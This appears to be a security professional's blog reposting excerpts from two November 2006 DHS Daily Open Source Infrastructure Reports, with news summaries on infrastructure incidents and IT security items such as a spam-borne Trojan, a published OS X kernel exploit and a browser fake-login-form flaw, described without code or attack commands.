Subscription to the full report on a daily basis can be obtained:
Send an eMail to dhsdailyadmin@mail.dhs.osis.gov with the subject "DHS Daily Open Source Infrastructure Report" and the following line in the body...subscribe.
To obtain a complete copy of the current report proceed to the DHS link below.
To obtain reports more than 10 business days old, send an eMail to DHS_Reports@e-computer-security.com. Be specific as to the reports you wish to receive.

Daily Report Monday, November 27, 2006

Daily HighlightsBouncers at some New Jersey bars and nightclubs are using a high−tech identification device to obtain a customer's age as well as personal information on a driver's license such as name, address, and license number as well as physical descriptions such as height, weight, and eye color. (See item 11)·The Associated Press reports the Bloomington Police Department's bomb squad removed what appeared to be an improvised explosive device from the trunk of a rental car Sunday, November 26, at the Minneapolis−St. Paul International Airport. (See item 12)·Bloomberg reports two of New York City's commuter railroads will have delays for the next two weeks because a particularly bad season of so−called slippery rail −− caused by wet leaves falling on the rails −− has damaged the wheels of more than 360 rail cars. (See item 13)

Information Technology and Telecommunications Sector29.November 24, Sophos— New Trojan tricks users with offer of free explicit images. Sophos has warned of a new spam campaign that claims to offer free explicit images and videos, in an attempt to trick users into downloading a malicious Trojan horse. According to Sophos, a Weblink to the Psyme−DL Trojan is being widely circulated within e−mails using a variety of subject lines, invariably containing the words "free" and "porn." The e−mails each contain a single sentence and a link to the malicious file.Source: http://www.sophos.com/pressoffice/news/articles/2006/11/porn spam.html

30.November 24, Security Focus— IAdware Trojan aims for Macs. On Thursday, November 23, antivirus firm F−Secure published a brief analysis of a proof−of−concept adware program for the Mac OS X that could theoretically hook into any application to run attacker−specified code. The program, dubbed IAdware by F−Secure, could be silently installed in a user's account 10without requiring administrator rights. The IAdware proof−of−concept code did nothing malicious, but merely opened up a browser each time an application was opened, F−Secure stated.Source: http://www.securityfocus.com/brief/366

31.November 24, VNUNet— IP Multimedia Subsystem full of gaps: Yankee Group. The IP Multimedia Subsystem (IMS) architecture is suffering from "gaping holes and inadequacies" which are limiting increased adoption and implementation of the communications standard, research has warned. These gaps in the architecture must be addressed by vendors and carriers that have invested in IMS as a unifying communications technology, according to a recently published Yankee Group report. The study noted that the growing interest of carriers in adopting IMS or next−generation architectures is met by increasing challenges. However, it acknowledges that all major carriers and vendors now have IMS in their road maps because it is being recognized as the unifying architecture.Source: http://www.vnunet.com/vnunet/news/2169423/ims−plagued−gaping −holes

Daily HighlightsIn the first nuclear−related evacuation since the Three Mile Island accident of 1979, a Tennessee school district sent all 1,800 pupils home on Tuesday morning, November 21, because operators at a nearby nuclear reactor believed they might have had a leak of radioactive cooling water inside the plant. (See item 2)·The Associated Press reports a chemical plant near Boston exploded early Wednesday, November 22, sparking a massive fire and blowing debris for blocks that damaged nearly 90 homes but caused only minor injuries. (See item 5)·The Department of Homeland Security and the Department of State have announced the official requirement for citizens of the United States, Canada, Mexico, and Bermuda to present a passport to enter the United States when arriving by air from any part of the Western Hemisphere beginning January 23, 2007. (See item 16)·WHO−TV reports nearly 1,000 Iowans have gotten ill in the last several weeks due to norovirus, which has occurred in a wide variety of settings such as social receptions, long−term care facilities, a gaming facility, business functions, restaurants, and schools (See item 27)

Information Technology and Telecommunications Sector34.November 22, eWeek— Exploit code published for Apple OS X glitch. Researchers have published exploit code that targets an unpatched kernel vulnerability in Apple's OS X desktop software. An independent vulnerability analyst working as part of the "Month of Kernel Bugs" campaign released the details necessary to attack the hole in OS X on Wednesday, November 22, revealing the manner in which hackers could target the glitch, which affects the way Apple's software handles disk image files. The researcher, identified only by the screen name "LMH," issued the exploit via a post on the Kernel Fun Website. "Mac OS X fails to properly handle corrupted image structures, leading to an exploitable denial−of−service condition," LMH wrote in his latest blog. "Although it hasn't been checked further, memory corruption is present under certain conditions." The researcher said that the demonstration exploit offered on the site would be unlikely to allow arbitrary code execution if applied by attackers, however, the analyst indicated that the flaw could be taken advantage of by malware writers by targeting the manner in which Cupertino, CA−based Apple's Safari browser downloads online image files.Source: http://www.eweek.com/article2/0,1895,2062806,00.asp

35.November 22, IDG News Service— Thieves steal chips worth millions. A gang of thieves stole computer chips reportedly worth millions of U.S. dollars in a Monday, November 20, raid on the Penang International Airport Free Commercial Zone in Batu Muang, Malaysia. Malaysian police are investigating the theft. The gang of 20 thieves subdued 17 security guards using weapons and chloroform before stealing 585 cartons and 18 pallets of microchips and motherboards manufactured by a multinational company in Bayan Lepas, Malaysia. The stolen goods were estimated to be worth $12.7 million, making the theft the largest ever in Malaysia. Source: http://www.infoworld.com/article/06/11/22/HNchipthieves_1.ht ml

36.November 22, CNET News— Firefox, IE vulnerable to fake login pages. Mozilla's Firefox 2 and Microsoft's Internet Explorer 7 are vulnerable to a flaw that could allow attackers to steal passwords. Dubbed a reverse cross−site request, or RCSR, vulnerability by its discoverer, Robert Chapin, the flaw lets hackers compromise users' passwords and usernames by presenting them with a fake login form. Firefox Password Manager will automatically enter any saved passwords and usernames into the form. The data is then automatically sent to an attacker's computer without the user's knowledge, according to the Chapin Information Services site. An exploit for this flaw has already been seen on social−networking site MySpace.com, and it could affect anyone using a blog or forum that allows user−generated HTML code to be added, according to Chapin. According to Chapin, an RCSR attack is much more likely to succeed than a cross−site scripting attack because neither Internet Explorer nor Firefox is designed to check the destination of form data before the user submits them. The browser doesn't sound an alarm because the exploit is conducted at the trusted Website.Source: http://news.com.com/Firefox%2C+IE+vulnerable+to+fake+login+pages/2100−1002_3−6137844.html?tag=nefd.top

Links

About Me

U.S. Army Retired Chief Warrant Officer with more than 40 years in information technology and 35 years in information security. Became a Certified Information Systems Security Professional in 1995 and have taught computer security in Asia, Canada and the United States. Wrote a computer security column for 5 years in the 1980s titled "for the Sake Of Security", penname R. E. (Bob) Johnston, which was published in Computer Decisions.
Motto: "When entrusted to process, you are obligated to safeguard"